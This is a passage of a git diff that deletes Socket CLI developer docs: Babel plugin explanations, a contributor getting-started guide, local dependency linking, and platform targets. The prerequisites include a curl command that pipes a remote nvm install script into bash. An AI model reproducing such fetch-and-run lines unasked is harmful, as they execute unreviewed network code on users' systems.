monorepo naturally -- Reduces duplication significantly -- Easier to maintain consistency -- Packages rarely need custom rules - -**Trade-off**: Packages can't easily override rules (but this is rarely needed) - -## Benefits - -1. **Reduced Duplication**: 100+ lines of config per package → 5-10 lines -2. **Easier Onboarding**: New packages start with proven configs -3. **Consistency**: All packages use same base settings -4. **Faster Updates**: Change config once, applies everywhere -5. **Better Defaults**: Settings chosen based on Socket experience -6. **Documentation**: Centralized documentation for all configs - -## Future Enhancements - -Potential improvements to the architecture: - -1. **Shared Scripts**: Extract common build scripts to `.config/scripts/` -2. **TypeScript Project References**: Enable composite builds for faster incremental compilation -3. **Shared Test Utilities**: Move test helpers to a shared package -4. **Shared Constants**: Extract build constants used across packages -5. **Config Validation**: Script to verify all packages extend base configs correctly - -## Related Documentation - -- [Configuration Migration Guide](./configuration-migration.md) - How to migrate packages -- [.config/README.md](../.config/README.md) - Usage examples and reference -- [CI Testing](./ci-testing.md) - CI/CD integration -- [Testing Best Practices](./testing-best-practices.md) - Test writing guidelines diff --git a/docs/development/babel-plugins.md b/docs/development/babel-plugins.md deleted file mode 100644 index ad2ea9ec8..000000000 --- a/docs/development/babel-plugins.md +++ /dev/null @@ -1,519 +0,0 @@ -# Socket CLI Babel Plugins - -This document explains the custom Babel plugins used to transform Socket CLI code during the build process. - -## Overview - -Socket CLI uses custom Babel plugins to ensure code compatibility and enable size optimizations: - -1. **`babel-plugin-strict-mode.mjs`** - Transforms loose-mode code to strict-mode -2. **`babel-plugin-remove-icu.mjs`** - Removes ICU dependencies (optional) - -## Strict Mode Plugin - -### Purpose - -Ensures all code runs correctly in strict mode by transforming problematic patterns that are allowed in loose mode but forbidden in strict mode. - -### Location - -`scripts/babel/babel-plugin-strict-mode.mjs` - -### Transformations - -#### 1. Octal Numeric Literals - -Legacy octal literals (starting with `0`) are converted to decimal equivalents. - -**Before:** -```javascript -var x = 0123 // Octal literal (83 in decimal) -var y = 0755 // Octal literal (493 in decimal) -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal 0123 → 83 */ -var x = 83 -/* Strict-mode: Transformed octal 0755 → 493 */ -var y = 493 -``` - -#### 2. Octal Escape Sequences in Strings - -Octal escape sequences in strings are converted to proper escape sequences or hex escapes. - -**Before:** -```javascript -var str1 = 'Hello\012World' // \012 = newline -var str2 = 'Tab\011here' // \011 = tab -var str3 = '\033[31mRed\033[0m' // \033 = ESC -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal escapes */ -var str1 = 'Hello\nWorld' -/* Strict-mode: Transformed octal escapes */ -var str2 = 'Tab\there' -/* Strict-mode: Transformed octal escapes */ -var str3 = '\x1b[31mRed\x1b[0m' -``` - -**Common Octal Escape Mappings:** -- `\10` → `\b` (backspace) -- `\11` → `\t` (tab) -- `\12` → `\n` (line feed) -- `\13` → `\v` (vertical tab) -- `\14` → `\f` (form feed) -- `\15` → `\r` (carriage return) -- `\16`-`\377` → `\xNN` (hex escape) - -#### 3. Template Literals - -Octal escapes in template literals are also transformed: - -**Before:** -```javascript -const msg = `Line1\012Line2` -``` - -**After:** -```javascript -'use strict' -/* Strict-mode: Transformed octal escapes in template */ -const msg = `Line1\nLine2` -``` - -#### 4. With Statements - -`with` statements cannot be safely transformed, so the plugin throws a compilation error: - -**Before:** -```javascript -with (obj) { - x = 1 -} -``` - -**After:** -``` -ERROR: "with" statement is not allowed in strict mode and cannot be safely transformed. -Please refactor your code to avoid using "with" statements. -``` - -#### 5. 'use strict' Directive - -Automatically adds `'use strict'` directive to files that don't have it: - -**Before:** -```javascript -function foo() { - return 42 -} -``` - -**After:** -```javascript -'use strict' - -function foo() { - return 42 -} -``` - -### Statistics - -The plugin tracks and reports transformations: - -```javascript -/* -Strict Mode Transformation Stats: - - Octal literals converted: 5 - - Octal escapes transformed: 12 - - With statements found: 0 - - Strict directives added: 1 - Total transformations: 18 -*/ -``` - -### Always Enabled - -This plugin is **always enabled** in Socket CLI builds. It ensures compatibility and catches potential issues early. - ---- - -## ICU Removal Plugin - -### Purpose - -Transforms ICU-dependent code into ICU-free alternatives, allowing Node.js to be built with `--without-intl` to save ~8-10MB. - -### Location - -`scripts/babel/babel-plugin-remove-icu.mjs` - -### Status - -**Disabled by default** - Only enable if building with `--without-intl` Node.js. - -### Transformations - -#### 1. Number Formatting - -Transforms `.toLocaleString()` calls to simple comma-separated formatting: - -**Before:** -```javascript -const count = 1234567 -console.log(`Found ${count.toLocaleString()} vulnerabilities`) -``` - -**After:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -/* ICU-free: Transformed toLocaleString() → __formatNumber() */ -console.log(`Found ${__formatNumber(count)} vulnerabilities`) -// Output: "Found 1,234,567 vulnerabilities" -``` - -#### 2. Date Formatting - -Transforms date formatting methods to ISO format: - -**Before:** -```javascript -const date = new Date() -console.log(`Scanned at ${date.toLocaleDateString()}`) -console.log(`Time: ${date.toLocaleTimeString()}`) -``` - -**After:** -```javascript -function __formatDate(date) { - return date.toISOString().split('T')[0] -} - -/* ICU-free: Transformed toLocaleDateString() → __formatDate() */ -console.log(`Scanned at ${__formatDate(date)}`) -// Output: "Scanned at 2025-10-07" - -/* ICU-free: Transformed toLocaleTimeString() → ISO time */ -console.log(`Time: ${date.toISOString().split('T')[1]}`) -``` - -#### 3. String Comparison - -Transforms `.localeCompare()` to basic string comparison: - -**Before:** -```javascript -packages.sort((a, b) => a.name.localeCompare(b.name)) -``` - -**After:** -```javascript -function __simpleCompare(a, b) { - return a < b ? -1 : a > b ? 1 : 0 -} - -/* ICU-free: Transformed localeCompare() → __simpleCompare() */ -packages.sort((a, b) => __simpleCompare(a.name, b.name)) -``` - -⚠️ **Note:** This uses byte comparison, not locale-aware sorting. `'ä'` may not sort correctly with non-ASCII characters. - -#### 4. Intl.* APIs - -Transforms `Intl.*` APIs to simple wrappers: - -**Before:** -```javascript -const formatter = new Intl.NumberFormat() -console.log(formatter.format(1234567)) - -const dateFormatter = new Intl.DateTimeFormat() -console.log(dateFormatter.format(new Date())) -``` - -**After:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -/* WARNING: Intl.NumberFormat removed - using basic number formatting */ -const formatter = { - format(num) { - return __formatNumber(num) - } -} -console.log(formatter.format(1234567)) -// Output: "1,234,567" - -/* WARNING: Intl.DateTimeFormat removed - using basic date formatting */ -const dateFormatter = { - format(date) { - return date.toISOString() - } -} -console.log(dateFormatter.format(new Date())) -// Output: "2025-10-07T11:30:00.000Z" -``` - -#### 5. Unicode Regular Expressions - -Transforms Unicode property escapes to character classes: - -**Before:** -```javascript -const letterRegex = /\p{Letter}/u -const digitRegex = /\p{Number}/u -const spaceRegex = /\p{White_Space}/u -``` - -**After:** -```javascript -/* ICU-free: Transformed unicode regex → character class */ -const letterRegex = /[a-zA-Z]/ -/* ICU-free: Transformed unicode regex → character class */ -const digitRegex = /[0-9]/ -/* ICU-free: Transformed unicode regex → character class */ -const spaceRegex = /\s/ -``` - -**Supported Transformations:** -- `\p{Letter}`, `\p{L}`, `\p{Alphabetic}` → `[a-zA-Z]` -- `\p{Number}`, `\p{N}`, `\p{Digit}`, `\p{Nd}` → `[0-9]` -- `\p{Space}`, `\p{White_Space}` → `\s` -- `\p{ASCII}` → `[\x00-\x7F]` - -⚠️ **Complex patterns not supported:** -```javascript -/\p{Script=Greek}/u // ❌ Will add warning comment -// WARNING: Complex unicode regex may not work without ICU! -``` - -### Statistics - -The plugin tracks and reports transformations: - -```javascript -/* -ICU Removal Stats: - - toLocaleString() calls: 8 - - toLocaleDateString() calls: 3 - - toLocaleTimeString() calls: 2 - - localeCompare() calls: 12 - - Intl.* API usage: 5 - - Unicode regex patterns: 7 - Total transformations: 37 -*/ -``` - -### Limitations - -When ICU is removed, the following features are lost: - -❌ **No real locale support** (only English-style formatting) -❌ **No timezone support** beyond UTC -❌ **No currency formatting** (`Intl.NumberFormat` with `style: 'currency'`) -❌ **No plural rules** (`Intl.PluralRules`) -❌ **No locale-aware sorting** (simple byte comparison only) -❌ **No date/time localization** (ISO format only) -❌ **Limited Unicode regex** (only basic character classes) - -### When to Enable - -Enable this plugin only if: - -✅ Building pkg binaries where every MB matters -✅ English-only CLI tool (no internationalization needed) -✅ Willing to trade locale support for ~8-10MB size reduction -✅ Ready to test all CLI output thoroughly - -### How to Enable - -#### Step 1: Enable the Babel Plugin - -Edit `.config/babel.config.js`: - -```javascript -module.exports = { - presets: ['@babel/preset-react', '@babel/preset-typescript'], - plugins: [ - // ... other plugins ... - path.join(babelPluginsPath, 'babel-plugin-strict-mode.mjs'), - path.join(babelPluginsPath, 'babel-plugin-inline-require-calls.js'), - path.join(babelPluginsPath, 'transform-set-proto-plugin.mjs'), - path.join(babelPluginsPath, 'transform-url-parse-plugin.mjs'), - // Uncomment to enable ICU removal: - path.join(babelPluginsPath, 'babel-plugin-remove-icu.mjs'), // ← Uncomment this line - ], -} -``` - -#### Step 2: Rebuild Node.js WITHOUT ICU - -Edit `scripts/build-yao-pkg-node.sh` and change configure options: - -```bash -./configure \ - --without-intl \ # ← Change from --with-intl=small-icu - --without-npm \ - --without-corepack \ - --without-inspector \ - --without-amaro \ - --without-sqlite -``` - -Then rebuild: - -```bash -cd .custom-node-build/node-yao-pkg -git reset --hard v24.9.0 -git clean -fdx -patch -p1 < ../patches/node.v24.9.0.cpp.patch -./configure --without-intl --without-npm --without-corepack --without-inspector --without-amaro --without-sqlite -make -j$(sysctl -n hw.ncpu) -``` - -#### Step 3: Rebuild Socket CLI - -```bash -cd $(pwd) -pnpm run build:cli -``` - -#### Step 4: Test Thoroughly - -Test all CLI functionality: - -```bash -# Test help output -pnpm exec socket --help -pnpm exec socket scan --help - -# Test number formatting (package counts, file sizes) -pnpm exec socket info some-package - -# Test date display -pnpm exec socket scan . - -# Run unit tests -pnpm run test:unit -``` - -### Size Impact - -| Configuration | Node.js Binary Size | ICU Plugin | Impact | -|---------------|-------------------|-----------|---------| -| Current | 82.7 MB | Disabled | Baseline | -| With ICU removal | ~74-76 MB | Enabled | **-8-10 MB** | - -**Note:** The actual size reduction comes from building Node.js with `--without-intl`. The Babel plugin just makes the code work without ICU. - ---- - -## Plugin Execution Order - -Plugins run in this order (defined in `.config/babel.config.js`): - -1. `@babel/preset-typescript` (preset) -2. `@babel/preset-react` (preset) -3. `@babel/plugin-proposal-export-default-from` -4. `@babel/plugin-transform-export-namespace-from` -5. `@babel/plugin-transform-runtime` -6. **`babel-plugin-strict-mode.mjs`** ⭐ (fixes loose-mode code first) -7. `babel-plugin-inline-require-calls.js` -8. `transform-set-proto-plugin.mjs` -9. `transform-url-parse-plugin.mjs` -10. `babel-plugin-remove-icu.mjs` (disabled by default, runs last if enabled) - -**Why this order?** -- Strict-mode transformations run early to fix fundamental issues -- ICU removal runs last to transform final API calls - ---- - -## Development - -### Testing Plugins - -To see the transformed output: - -```bash -# Build with transformations -pnpm run build:cli - -# Check transformed code -cat dist/cli.js | head -200 - -# Look for plugin comments -grep -n "Strict-mode:" dist/*.js -grep -n "ICU-free:" dist/*.js -``` - -### Adding a New Plugin - -1. Create file in `scripts/babel/` with `.mjs` extension -2. Add `@fileoverview` header -3. Export default function returning Babel plugin -4. Add to `.config/babel.config.js` -5. Test with `pnpm run build:cli` - -See `scripts/babel/README.md` for detailed instructions. - ---- - -## Related Documentation - -- [Babel Plugin Development Guide](../scripts/babel/README.md) -- [yao-pkg Build Documentation](./YAO_PKG_BUILD.md) -- [Node.js ICU Documentation](https://nodejs.org/api/intl.html) -- [Babel Plugin Handbook](https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md) - ---- - -## Troubleshooting - -### Plugin Not Running - -If transformations aren't being applied: - -1. Check plugin is uncommented in `.config/babel.config.js` -2. Rebuild: `pnpm run build:cli` -3. Check for Babel errors: `pnpm run build:cli 2>&1 | grep -i error` - -### ICU Plugin Enabled But Code Still Works - -If you enabled the ICU plugin but code using `Intl.*` still works: - -- Node.js may still have ICU enabled (`--with-intl=small-icu`) -- Rebuild Node.js with `--without-intl` (see Step 2 above) -- Verify with: `PKG_EXECPATH=PKG_INVOKE_NODEJS ./out/Release/node -e "console.log(typeof Intl)"` - - Should output: `undefined` - -### Tests Failing After Enabling ICU Removal - -Some tests may fail because they expect real locale support: - -1. Update test expectations for ICU-free output -2. Mock `Intl.*` APIs in tests if needed -3. Check test snapshots: `pnpm run test:unit:update` - ---- - -## Summary - -Socket CLI uses custom Babel plugins to: - -1. **Ensure strict-mode compatibility** (always enabled) -2. **Optionally remove ICU dependencies** for ~8-10MB size savings - -The strict-mode plugin is production-ready and always enabled. The ICU removal plugin is optional and should only be enabled when building size-optimized pkg binaries with custom Node.js builds. diff --git a/docs/development/getting-started.md b/docs/development/getting-started.md deleted file mode 100644 index f74d8b835..000000000 --- a/docs/development/getting-started.md +++ /dev/null @@ -1,570 +0,0 @@ -# Getting Started with Socket CLI Development - -Complete end-to-end guide for new contributors to Socket CLI. - -## Prerequisites - -Before starting, ensure you have: - -| Requirement | Minimum Version | Check Command | -|-------------|----------------|---------------| -| Node.js | 18.0.0+ | `node --version` | -| pnpm | 10.16.0+ | `pnpm --version` | -| Git | 2.0+ | `git --version` | -| Disk Space | ~5 GB | `df -h .` | - -### Installing Prerequisites - -**Node.js 18+:** -```bash -# macOS (using Homebrew) -brew install node@20 - -# Linux (using nvm) -curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.0/install.sh | bash -nvm install 20 - -# Windows (using Chocolatey) -choco install nodejs-lts -``` - -**pnpm 10.16+:** -```bash -# Using npm (comes with Node.js) -npm install -g pnpm - -# Or using Homebrew (macOS) -brew install pnpm - -# Or use corepack (built into Node.js 16+) -corepack enable -corepack prepare pnpm@latest --activate - -# Verify installation -pnpm --version # Should be 10.16.0 or higher -``` - -## Quick Start (5 Minutes) - -Get Socket CLI running locally in 5 steps: - -```bash -# 1. Clone the repository -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# 2. Install dependencies -pnpm install - -# 3. Build the CLI -pnpm run build - -# 4. Test the CLI -pnpm exec socket --version - -# 5. Run tests -pnpm run test:unit -``` - -**Expected output:** -``` -$ pnpm exec socket --version -CLI: v1.2.0 -``` - -If you see the version number, congratulations! Your setup is working. - -**Note:** You may see a banner with token/org info - this is normal and comes from your local config. Most commands work without an API token during development. - -## Detailed Setup - -### Step 1: Clone the Repository - -```bash -# Clone from GitHub -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# Or if you have SSH keys configured -git clone git@github.com:SocketDev/socket-cli.git -cd socket-cli -``` - -**Verification:** -```bash -ls -la -# Should see: package.json, packages/, docs/, etc. -``` - -### Step 2: Install Dependencies - -```bash -pnpm install -``` - -**What this does:** -- Installs all npm dependencies -- Sets up pnpm workspace for the monorepo -- Links internal packages together -- Downloads Socket registry overrides - -**Expected output:** -``` -Packages: +500 -++++++++++++++++++++++++++++++++ -Progress: resolved 500, reused 500, downloaded 0, added 500, done -``` - -**Verification:** -```bash -ls -la node_modules -# Should see many packages installed -``` - -### Step 3: Build the CLI - -```bash -pnpm run build -``` - -**What this does:** -- Compiles TypeScript source files to JavaScript -- Generates type definitions -- Creates the `dist/` directory with built files -- Takes ~30 seconds - -**Expected output:** -``` -> socket-cli@1.0.80 build -> pnpm run build:cli - -✓ TypeScript compilation complete -✓ Type definitions generated -✓ Build artifacts created in dist/ -``` - -**Verification:** -```bash -ls -la packages/cli/dist -# Should see: cli.js and other compiled files -``` - -### Step 4: Run the CLI Locally - -```bash -# Run using pnpm exec (recommended) -pnpm exec socket --version -``` - -**Try some commands:** -```bash -# Show help -pnpm exec socket --help - -# These work without API token -pnpm exec socket --version -pnpm exec socket --help-full - -# Commands that require API token -pnpm exec socket package lodash --view -pnpm exec socket scan create -``` - -### Step 5: Run Tests - -```bash -# Run all tests (lint, type-check, unit tests) -pnpm run test - -# Or run just unit tests (from CLI package) -pnpm --filter @socketsecurity/cli run test:unit - -# Or run specific test file -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -``` - -**Expected output:** -``` -✓ packages/cli/src/commands/scan/cmd-scan.test.mts (10 tests) 234ms -✓ packages/cli/src/utils/config.test.mts (15 tests) 156ms - -Test Files 2 passed (2) -Tests 25 passed (25) -``` - -**Verification:** -```bash -echo $? -# Should output: 0 (success) -``` - -## Development Workflow - -### Making Changes - -1. **Create a feature branch:** - ```bash - git checkout -b feature/my-awesome-feature - ``` - -2. **Make your changes:** - - Edit files in `packages/cli/src/` - - Follow the code style in `CLAUDE.md` - - Use `.mts` extension for TypeScript files - -3. **Build and test:** - ```bash - pnpm run build - pnpm run test:unit - ``` - -4. **Test your changes:** - ```bash - # Run the CLI with your changes - pnpm exec socket - - # Or use the quick build + run script - pnpm run bs - ``` - -### Common Development Tasks - -**Build the CLI:** -```bash -pnpm run build -``` - -**Run the CLI:** -```bash -# After building -pnpm exec socket --help -pnpm exec socket --version - -# Test basic commands (no API token required) -pnpm exec socket --version -pnpm exec socket --help -``` - -**Run tests:** -```bash -# All tests (includes build step) -pnpm run test - -# Just unit tests -pnpm --filter @socketsecurity/cli run test:unit - -# Specific test file -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -``` - -**Fix linting issues:** -```bash -pnpm run fix -``` - -**Type checking:** -```bash -pnpm run type -``` - -**Update test snapshots:** -```bash -# Update all snapshots -pnpm run testu - -# Update specific test file -pnpm run testu packages/cli/src/commands/scan/cmd-scan.test.mts -``` - -### Testing Strategies - -**Test a single file (fast):** -```bash -pnpm --filter @socketsecurity/cli run test:unit src/utils/config.test.mts -``` - -**Test with pattern matching:** -```bash -pnpm --filter @socketsecurity/cli run test:unit src/commands/scan/cmd-scan.test.mts -t "should handle errors" -``` - -**Test with coverage:** -```bash -pnpm --filter @socketsecurity/cli run test:unit:coverage -``` - -**Watch mode (auto-rerun on changes):** -```bash -pnpm --filter @socketsecurity/cli run test:unit -- --watch -``` - -## Project Structure - -Understanding the codebase organization: - -``` -socket-cli/ -├── packages/cli/ # Main CLI package -│ ├── src/ -│ │ ├── cli.mts # Entry point -│ │ ├── commands/ # Command implementations -│ │ │ ├── scan/ # Scan command -│ │ │ │ ├── cmd-scan.mts # Command definition -│ │ │ │ ├── handle-scan.mts # Business logic -│ │ │ │ └── output-scan.mts # Output formatting -│ │ │ ├── optimize/ # Optimize command -│ │ │ └── ... # Other commands -│ │ ├── utils/ # Shared utilities -│ │ ├── types.mts # Type definitions -│ │ └── constants.mts # Constants -│ ├── dist/ # Build output (gitignored) -│ └── test/ # Test files -├── packages/yoga-layout/ # WASM builder for Yoga -├── packages/onnx-runtime-builder/ # ONNX Runtime WASM -├── packages/minilm-builder/ # ML model builder -├── packages/node-smol-builder/ # Custom Node.js builder -├── packages/node-sea-builder/ # SEA binary builder -├── docs/ # Documentation -│ ├── architecture/ # System design -│ ├── build/ # Build guides -│ ├── development/ # Developer guides -│ └── testing/ # Testing strategies -└── scripts/ # Build and utility scripts -``` - -### Command Architecture Pattern - -Each command follows this pattern: -- `cmd-*.mts` - Command definition and CLI interface (meow flags, help text) -- `handle-*.mts` - Business logic and processing -- `output-*.mts` - Output formatting (JSON, markdown, etc.) -- `fetch-*.mts` - API calls (when applicable) - -**Example: Scan command** -``` -commands/scan/ -├── cmd-scan.mts # CLI interface, flags -├── handle-scan.mts # Processing logic -├── output-scan.mts # Format results -└── fetch-scan.mts # API interactions -``` - -## Building Advanced Components - -Socket CLI includes several advanced build components. You typically don't need to build these for CLI development, but here's how: - -### Building WASM Components - -```bash -# Build all WASM components -node scripts/build-all-binaries.mjs --wasm-only - -# Or build individually -cd packages/yoga-layout -pnpm run build -``` - -**Requirements:** -- Emscripten SDK (for yoga-layout) -- Rust + wasm-pack (for ONNX, models) - -See: [Build Toolchain Setup](../build/build-toolchain-setup.md) - -### Building Custom Node.js - -```bash -# Build custom Node.js for current platform -node scripts/build-all-binaries.mjs --smol-only -``` - -**Requirements:** -- Python 3.8+ -- C++ compiler (GCC, Clang, or MSVC) -- ~10 GB disk space -- ~30 minutes build time - -See: [Build Quick Start](../build/build-quick-start.md) - -## Linking to Local Dependencies - -For developing with local versions of Socket dependencies: - -```bash -# Link to local socket-registry and socket-sdk-js -node scripts/setup-links.mjs - -# This enables hot-reloading from sibling repositories -``` - -See: [Development Linking](./linking.md) - -## Troubleshooting - -### Issue: Banner shows "token: iToke*** (config)" - -This is **normal** - Socket CLI reads your local config file (`.socketrc.json` or environment variables). Most commands work without an API token during development: - -```bash -# These work without API token -pnpm exec socket --version -pnpm exec socket --help - -# These require API token -pnpm exec socket package lodash --view -pnpm exec socket scan create -``` - -To suppress config, use `--config '{}'`: -```bash -pnpm exec socket --config '{}' --version -``` - -### Issue: "pnpm: command not found" - -```bash -# Install pnpm globally -npm install -g pnpm - -# Or use corepack (built into Node.js 16+) -corepack enable -corepack prepare pnpm@latest --activate -``` - -### Issue: "Cannot find module" errors - -```bash -# Clean and reinstall dependencies -rm -rf node_modules packages/*/node_modules -pnpm install -pnpm run build -``` - -### Issue: Tests failing - -```bash -# Ensure you built first -pnpm run build - -# Run specific failing test for debugging -pnpm test:unit -t "test name" - -# Check if snapshots need updating -pnpm run testu -``` - -### Issue: "Out of memory" during build - -```bash -# Increase Node.js memory limit -export NODE_OPTIONS="--max-old-space-size=4096" -pnpm run build -``` - -### Issue: TypeScript errors - -```bash -# Rebuild the project -pnpm run build - -# Run type checker -pnpm run type -``` - -### Issue: Build is very slow - -```bash -# Clean and rebuild -pnpm run clean -pnpm run build - -# Or build just what you need -pnpm --filter @socketsecurity/cli run build -``` - -### Issue: Can't run CLI after build - -```bash -# Check that build succeeded -ls -la packages/cli/dist/cli.js - -# Try running directly -node packages/cli/dist/cli.js --version - -# Check Node version -node --version # Should be 20+ -``` - -### Issue: Git hooks failing on commit - -```bash -# Fix linting issues first -pnpm run fix - -# Or bypass hooks temporarily (not recommended) -git commit --no-verify -``` - -## Next Steps - -Now that you have Socket CLI running locally: - -1. **Read the architecture docs:** - - [Repository Structure](../architecture/repository.md) - - [Bootstrap/Stub Architecture](../architecture/bootstrap-stub.md) - -2. **Learn the coding standards:** - - Read `CLAUDE.md` in the repository root - - Review existing commands for patterns - -3. **Pick an issue to work on:** - - Browse [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) - - Look for "good first issue" labels - -4. **Make your first contribution:** - - Create a feature branch - - Make your changes - - Write tests - - Submit a pull request - -## Getting Help - -If you encounter issues not covered here: - -1. Check existing documentation: - - [Build Quick Start](../build/build-quick-start.md) - - [Build Toolchain Setup](../build/build-toolchain-setup.md) - - [Testing Guide](../testing/local-testing.md) - -2. Search [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) - -3. Ask in [Socket Community Discord](https://socket.dev/discord) - -4. File a [Bug Report](https://github.com/SocketDev/socket-cli/issues/new) - -## Quick Command Reference - -| Task | Command | -|------|---------| -| Install dependencies | `pnpm install` | -| Build CLI | `pnpm run build` | -| Run CLI | `pnpm exec socket ` | -| Run all tests | `pnpm run test` | -| Run unit tests | `pnpm --filter @socketsecurity/cli run test:unit` | -| Fix linting | `pnpm run fix` | -| Type check | `pnpm run type` | -| Clean build artifacts | `pnpm run clean` | - -## Verification Checklist - -Before submitting your first PR, verify: - -- [ ] `pnpm install` completes successfully -- [ ] `pnpm run build` completes without errors -- [ ] `pnpm exec socket --version` shows version number -- [ ] `pnpm run test:unit` passes all tests -- [ ] `pnpm run type` passes without errors -- [ ] `pnpm run fix` fixes any linting issues -- [ ] Your code follows patterns in `CLAUDE.md` -- [ ] You've tested your changes locally - -Welcome to Socket CLI development! diff --git a/docs/development/linking.md b/docs/development/linking.md deleted file mode 100644 index 28de664c5..000000000 --- a/docs/development/linking.md +++ /dev/null @@ -1,184 +0,0 @@ -# Socket Project Linking for Development - -## Overview - -A simple system for linking Socket projects during local development: -- **Local development**: Uses filesystem links to sibling projects -- **CI/production**: Uses published npm packages - -The key: `.pnpmfile.cjs` files are **generated locally** and **gitignored**, so they never affect CI/production. - -## How It Works - -### For Developers - -```bash -# Enable local linking (clones dependencies if needed) -node scripts/setup-links.mjs - -# Use GitHub main branches -node scripts/setup-links.mjs main --all - -# Reset to published packages -node scripts/setup-links.mjs published --all -``` - -This generates `.pnpmfile.cjs` files that redirect dependencies: -- `local` → `link:../socket-registry/registry` -- `main` → `github:SocketDev/socket-registry#main` -- `published` → removes .pnpmfile.cjs (uses package.json) - -### For CI/Production - -**Nothing special needed!** - -Since `.pnpmfile.cjs` is gitignored: -- CI never sees these files -- `pnpm install` uses normal package.json dependencies -- Always gets stable, published packages from npm - -## What Can Be Linked - -| Project | Can Link To | -|---------|------------| -| socket-cli | @socketsecurity/registry, @socketsecurity/sdk | -| socket-sdk-js | @socketsecurity/registry | -| socket-packageurl-js | @socketsecurity/registry | - -## Developer Workflow - -### Initial Setup - -```bash -cd socket-cli - -# Setup local linking (auto-clones dependencies if needed) -node scripts/setup-links.mjs - -# This creates .pnpmfile.cjs (gitignored) and runs pnpm install -``` - -### Making Changes - -1. **Edit dependency code**: - ```bash - cd ../socket-registry/registry - # Make changes - pnpm build - ``` - -2. **Changes are immediately available** in linked projects (no publish needed) - -### Testing Different Versions - -```bash -# Test with local code -node scripts/setup-links.mjs local -pnpm test - -# Test with GitHub main branch -node scripts/setup-links.mjs main -pnpm test - -# Test with published packages (like CI) -node scripts/setup-links.mjs published -pnpm test -``` - -## How GitHub/CI Handles This - -### What Gets Committed - -✅ **Committed to repo:** -- `scripts/setup-links.mjs` - The setup tool -- `package.json` - Normal dependencies (unchanged) - -❌ **NOT committed (gitignored):** -- `.pnpmfile.cjs` - Local overrides -- `.env.local` - Local environment - -### CI Behavior - -```yaml -# In GitHub Actions -jobs: - test: - steps: - - uses: actions/checkout@v5 - - run: pnpm install # Uses package.json normally - # .pnpmfile.cjs doesn't exist, so no overrides applied -``` - -**Result:** CI always uses stable, published packages - -## Examples - -### Setup All Projects for Local Development - -```bash -node scripts/setup-links.mjs --all -``` - -### Work on socket-registry Changes - -```bash -# In socket-cli, link to local registry -node scripts/setup-links.mjs local - -# Make changes in registry -cd ../socket-registry/registry -vim src/lib/logger.ts -pnpm build - -# Changes immediately available in socket-cli -cd ../../socket-cli -pnpm test # Uses your local changes -``` - -### Test socket-cli with Local SDK - -```bash -# socket-cli can link both registry and SDK -node scripts/setup-links.mjs local socket-cli - -# This creates overrides for both: -# @socketsecurity/registry → ../socket-registry/registry -# @socketsecurity/sdk → ../socket-sdk-js -``` - -### Reset to Production Mode - -```bash -# Remove all overrides -node scripts/setup-links.mjs published --all - -# Now uses npm packages like production -``` - -## Benefits - -1. **Clean Repository**: No linking configuration in the repo -2. **CI Simplicity**: CI just runs `pnpm install` normally -3. **Developer Flexibility**: Easy switching between local/main/published -4. **Auto-Setup**: Clones missing dependencies automatically -5. **No Accidents**: Can't accidentally commit local paths - -## Troubleshooting - -### Changes Not Reflected -- Ensure dependency is built: `cd ../socket-registry/registry && pnpm build` -- Check .pnpmfile.cjs exists: `ls -la .pnpmfile.cjs` -- Re-run setup: `node scripts/setup-links.mjs local` - -### CI Issues -- CI should never see .pnpmfile.cjs (it's gitignored) -- If CI fails, ensure .pnpmfile.cjs is in .gitignore -- CI always uses published packages (no setup needed) - -### Missing Dependencies -- Script auto-clones from GitHub if not found locally -- Or manually clone: `git clone https://github.com/SocketDev/socket-registry.git ../socket-registry` - -## Key Principle - -**Development linking is a local-only concern.** The repository stays clean, and CI/production always uses stable, published packages. The `.pnpmfile.cjs` mechanism is invisible to anyone not actively developing locally. \ No newline at end of file diff --git a/docs/development/platform-support.md b/docs/development/platform-support.md deleted file mode 100644 index 2695699b7..000000000 --- a/docs/development/platform-support.md +++ /dev/null @@ -1,506 +0,0 @@ -# pkg Platform Support for Socket CLI - -## Overview - -Socket CLI pkg binaries are built for all major platforms and architectures, ensuring maximum compatibility across desktop environments, Docker containers, and cloud infrastructure. - -## Supported Platforms - -The `pkg.json` configuration targets these platforms: - -```json -{ - "targets": [ - "node24-macos-arm64", // Apple Silicon Macs (M1/M2/M3/M4) - "node24-macos-x64", // Intel Macs - "node24-linux-arm64", // ARM64 Linux - "node24-linux-x64", // x86_64 Linux - "node24-win-arm64", // Windows on ARM - "node24-win-x64" // Windows x86_64 - ] -} -``` - -## Platform Details - -### macOS - -#### node24-macos-arm64 -- **Architecture:** Apple Silicon (ARM64) -- **Devices:** MacBook Pro/Air M1/M2/M3/M4, Mac Mini M1/M2/M4, Mac Studio, iMac M1/M3/M4 -- **Minimum OS:** macOS 13.5+ (Ventura) -- **Docker:** Not applicable (macOS doesn't run native Docker containers) - -#### node24-macos-x64 -- **Architecture:** Intel x86_64 -- **Devices:** Intel-based Macs (2010-2020) -- **Minimum OS:** macOS 13.5+ (Ventura) -- **Rosetta 2:** Can also run on Apple Silicon via Rosetta 2 translation -- **Docker:** Not applicable - -### Linux - -#### node24-linux-x64 ⭐ Most Common Docker Platform -- **Architecture:** x86_64 (AMD64) -- **OS:** Any modern Linux distribution - - Ubuntu 18.04+ - - Debian 10+ - - Alpine Linux 3.14+ - - Amazon Linux 2/2023 - - Red Hat Enterprise Linux 8+ - - CentOS 8+ - - Fedora 36+ -- **Glibc:** 2.27+ (Ubuntu 18.04+) -- **Musl:** Supported (Alpine Linux) -- **Docker:** ✅ **Most common Docker platform** - - `FROM ubuntu:22.04` - - `FROM node:24-alpine` - - `FROM node:24-bullseye` - - `FROM amazonlinux:2023` - - Standard `linux/amd64` architecture - -#### node24-linux-arm64 -- **Architecture:** ARM64 (aarch64) -- **OS:** Any modern ARM64 Linux 